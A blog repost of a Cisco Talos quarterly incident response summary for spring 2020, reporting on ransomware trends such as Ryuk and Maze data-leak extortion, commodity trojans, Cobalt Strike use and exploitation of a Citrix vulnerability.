2nd Edition

Tracking the trends and news for IT and IT Security

Paul

Quarterly Report: Incident Response trends in Spring 2020

TIR_quarterly_trends_banner.jpgQuarterly Report: Incident Response trends in Spring 2020>
Talos Blog – David Liebenberg
Cisco Talos Incident Response (CTIR) engagements continue to be dominated by ransomware and commodity trojans. As alluded to in last quarterâs report, ransomware actors have begun threatening to release sensitive information from victims as a means of further compelling them to pay. Additionally, DDoS and coinminer threats reemerged in spring 2020 after absences in the previous quarter. Looking at information from November 2019 through January 2020, ransomware maintains its status as the most prevalent threat, and CTIR has observed some changes in the top ransomware offender â Ryuk. The top targeted verticals were financial services and government, a change from last quarter when the top targeted vertical was manufacturing. Although there were some new trends this quarter â including ransomware actors adding extortion to their toolkit, increased observations of the use of red teaming tool Cobalt Strike, and an uptick in the exploitation of a vulnerability in the Citrix Application Delivery Controller (CVE-2019-19781) â this quarter demonstrated the continued threat posed by ransomware, particularly Ryuk, and commodity trojans such as Emotet and Trickbot. We observed this in two engagements involving Maze ransomware actors, in which the adversaries exfiltrated sensitive information to an FTP server and threatened to publish it if the ransom was not paid. The Maze team has continued to use this tactic, creating a public website where they release information regarding affected organizations. Other ransomware actors have begun following suit as well, including Sodinokibi, Nemty, DoppelPaymer, Nefilim, CLOP and Sekhmet. This is a particularly dangerous trend since it further compels victims to pay and negates traditional ways of combating ransomware attacks, such as maintaining backups. CTIR also observed continued exploitation of web applications, particularly for Citrix Application Delivery Controller (CVE-2019-19781). CTIR also observed a shift from Ryuk actors leveraging PSExec to deploy Ryuk to more use of Windows Management Instrumentation (WMI), BITSAdmin, and the red-teaming framework Cobalt Strike.
Link: https://blog.talosintelligence.com/2020/04/IR-quarterly-threat-report-spring-2020.html

Categories:

Tags: